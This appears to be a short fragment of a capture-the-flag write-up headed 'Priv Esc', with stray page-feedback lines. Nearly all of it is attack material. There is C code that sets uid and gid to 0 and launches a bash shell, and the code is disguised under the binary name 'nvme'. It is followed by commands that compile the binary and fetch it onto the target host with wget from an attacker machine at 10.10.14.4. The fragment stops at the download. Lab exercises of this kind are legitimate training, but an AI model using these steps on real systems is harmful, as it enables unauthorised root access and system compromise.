Priv Esc
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}❯ vi nvme.c
❯ gcc nvme.c -o nvmeoliver@editor:~$ wget 10.10.14.4/nvme
--2025-09-20 05:20:04-- http://10.10.14.4/nvme
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16056 (16K) [text/plain]
Saving to: ‘nvme’
nvme 100%[==============================>] 15.68K --.-KB/s in 0.04s
2025-09-20 05:20:04 (362 KB/s) - ‘nvme’ saved [16056/16056]